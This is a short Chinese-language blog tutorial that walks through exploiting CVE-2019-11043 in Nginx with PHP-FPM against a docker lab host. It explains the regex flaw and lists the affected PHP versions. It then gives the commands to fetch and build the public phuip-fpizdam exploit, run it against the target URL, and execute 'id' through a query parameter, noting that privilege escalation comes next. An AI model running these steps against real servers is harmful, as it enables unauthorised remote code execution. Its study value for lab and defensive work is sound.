CVE-2019-11043 简单利用

华盟原创文章投稿奖励计划

CVE-2019-11043 是一个远程代码执行漏洞,使用某些特定配置的 Nginx PHP-FPM 的服务器存在漏洞,可允许攻击者远程执行代码。向Nginx PHP-FPM的服务器 URL发送 时,服务器返回异常。攻击者可以使用换行符(%0a)来破坏fastcgi_split_path_info指令中的Regexp。Regexp被损坏导致PATH_INFO为空,从而触发该漏洞

影响范围

在 Nginx PHP-FPM 环境下,当启用了上述 Nginx 配置后,以下 PHP 版本受本次漏洞影响:
PHP 7.0 
PHP 7.1 
PHP 7.2 
PHP 7.3 

漏洞利用


首先访问漏洞环境,漏洞环境是用docker搭建的。

CVE-2019-11043 简单利用

攻击机是kali,攻击脚本是go语言写的所以要有go环境,从github上下载exp


go get github.com/neex/phuip-fpizdam
go install github.com/neex/phuip-fpizdam

CVE-2019-11043 简单利用

执行上面命令后,目录下就会生成 phuip-fpizdam 文件,然后执行攻击命令
./phuip-fpizdam 

http://192.168.123.49:8080/index.php

CVE-2019-11043 简单利用

在浏览器输入执行命令,查看当前id
http://192.168.123.49:8080/?a=id

CVE-2019-11043 简单利用


很明显攻击成功了,当前用户是www-data 还需要进一步提取呀!


注:本实验不得用于商业用途,仅做学习交流,一切后果自行承担。

本文原创,作者:张,其版权均为华盟网所有。如需转载,请注明出处:https://www.77169.net/html/264403.html

发表评论